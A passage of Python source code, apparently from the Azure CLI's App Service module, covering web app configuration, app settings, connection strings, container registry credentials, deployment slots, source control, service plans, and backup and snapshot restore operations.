'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
    # note: getargvalues is already used in azure.cli.core.commands,
    # and there is no simple functional replacement for this deprecated method on Python 3.5
    args, _, _, values = inspect.getargvalues(frame)  # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
setattr(configs, 'scm_ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
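# Each entry in generic_configurations above is either a JSON object (merged via get_json_object) or a
# plain key=value pair split on the first '='; for example (illustrative values):
#   '{"alwaysOn": true}'     -> setattr(configs, 'alwaysOn', True)
#   'minTlsVersion=1.2'      -> setattr(configs, 'minTlsVersion', '1.2')
# ip_security_restrictions is special-cased so those fields are only sent when explicitly updated.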
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
return result.properties
def _ssl_context():
    import platform
    if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise ArgumentUsageError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
        if value[0] in ["'", '"']:  # strip away the quotes used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
        logger.warning('Both --multicontainer-config-file FILE and --multicontainer-config-type TYPE must be specified')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise ResourceNotFoundError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise ResourceNotFoundError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
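# The masking above nulls out any entry that matches APPSETTINGS_TO_MASK (currently only
# DOCKER_REGISTRY_SERVER_PASSWORD) so registry credentials are not echoed back to the caller.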
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
from azure.mgmt.web.models import HostNameBinding
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
host_name_binding=binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
slot=slot, host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
    # the logic here is ported from the portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None,
deployment_container_image_name=None, docker_registry_server_password=None,
docker_registry_server_user=None):
container_args = deployment_container_image_name or docker_registry_server_password or docker_registry_server_user
if container_args and not configuration_source:
raise ArgumentUsageError("Cannot use arguments --deployment-container_image_name, "
"--docker-registry-server_password, or --docker-registry-server-user without argument "
"--configuration-source")
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise ResourceNotFoundError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise ValidationError("'{}' is a function app. Please use "
"`az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source,
deployment_container_image_name, docker_registry_server_password,
docker_registry_server_user,
docker_registry_server_url=docker_registry_server_url)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None,
deployment_container_image_name=None, docker_registry_server_password=None,
docker_registry_server_user=None):
container_args = deployment_container_image_name or docker_registry_server_password or docker_registry_server_user
if container_args and not configuration_source:
raise ArgumentUsageError("Cannot use arguments --deployment-container-image_name, "
"--docker-registry-server_password, or --docker-registry-server-user without argument "
"--configuration-source")
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise ResourceNotFoundError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source,
deployment_container_image_name, docker_registry_server_password,
docker_registry_server_user,
docker_registry_server_url=docker_registry_server_url)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None,
deployment_container_image_name=None, docker_registry_server_password=None,
docker_registry_server_user=None, docker_registry_server_url=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings, slot, client)
if deployment_container_image_name or docker_registry_server_password or docker_registry_server_user:
update_container_settings(cmd, resource_group_name, webapp,
docker_custom_image_name=deployment_container_image_name, slot=slot,
docker_registry_server_user=docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password,
docker_registry_server_url=docker_registry_server_url)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, github_action=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
            # for non-server errors (anything other than 50x), just throw; otherwise retry up to 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
    Update the source control token cached in Azure App Service. If no token is provided,
    the command will clear the existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
site_config = get_site_configs(cmd, resource_group_name, name, slot)
site_config.scm_type = 'LocalGit'
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
    except CloudError as ex:  # Because of a bad spec, the SDK throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
# TODO use zone_redundant field on ASP model when we switch to SDK version 5.0.0
def _enable_zone_redundant(plan_def, sku_def, number_of_workers):
plan_def.enable_additional_properties_sending()
existing_properties = plan_def.serialize()["properties"]
plan_def.additional_properties["properties"] = existing_properties
plan_def.additional_properties["properties"]["zoneRedundant"] = True
if number_of_workers is None:
sku_def.capacity = 3
else:
sku_def.capacity = max(3, number_of_workers)
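# A zone-redundant plan is forced to a capacity of at least 3 workers here; the assumption is that
# instances must be spread across (at least) three availability zones for zone redundancy to apply.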
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False, zone_redundant=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
            raise ArgumentUsageError('Windows containers are not yet supported in an App Service Environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_tier(sku), name=_normalize_sku(sku), capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
if sku.upper() in ['WS1', 'WS2', 'WS3']:
existing_plan = get_resource_if_exists(client.app_service_plans,
resource_group_name=resource_group_name, name=name)
        if existing_plan and existing_plan.sku.tier != "WorkflowStandard":
            raise ValidationError("Plan {} in resource group {} already exists and cannot be updated to "
                                  "a logic app SKU (WS1, WS2, or WS3)".format(name, resource_group_name))
plan_def.type = "elastic"
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None, elastic_scale=None,
max_elastic_worker_count=None):
if number_of_workers is None and sku is None and elastic_scale is None and max_elastic_worker_count is None:
args = ["--number-of-workers", "--sku", "--elastic-scale", "--max-elastic-worker-count"]
logger.warning('Nothing to update. Set one of the following parameters to make an update: %s', str(args))
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_tier(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
else:
number_of_workers = sku_def.capacity
if elastic_scale is not None or max_elastic_worker_count is not None:
if sku is None:
sku = instance.sku.name
if get_sku_tier(sku) not in ["PREMIUMV2", "PREMIUMV3"]:
raise ValidationError("--number-of-workers and --elastic-scale can only be used on premium V2/V3 SKUs. "
"Use command help to see all available SKUs")
if elastic_scale is not None:
# TODO use instance.elastic_scale_enabled once the ASP client factories are updated
use_additional_properties(instance)
instance.additional_properties["properties"]["elasticScaleEnabled"] = elastic_scale
if max_elastic_worker_count is not None:
instance.maximum_elastic_worker_count = max_elastic_worker_count
if max_elastic_worker_count < number_of_workers:
raise InvalidArgumentValueError("--max-elastic-worker-count must be greater than or equal to the "
"plan's number of workers. To update the plan's number of workers, use "
"--number-of-workers ")
# TODO use instance.maximum_elastic_worker_count once the ASP client factories are updated
use_additional_properties(instance)
instance.additional_properties["properties"]["maximumElasticWorkerCount"] = max_elastic_worker_count
instance.sku = sku_def
return instance
def show_plan(cmd, resource_group_name, name):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
subscription_id = get_subscription_id(cmd.cli_ctx)
serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name, client.DEFAULT_API_VERSION)
request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
response = send_raw_request(cmd.cli_ctx, "GET", request_url)
return response.json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise ValidationError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise ResourceNotFoundError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise ResourceNotFoundError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.begin_restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.begin_restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
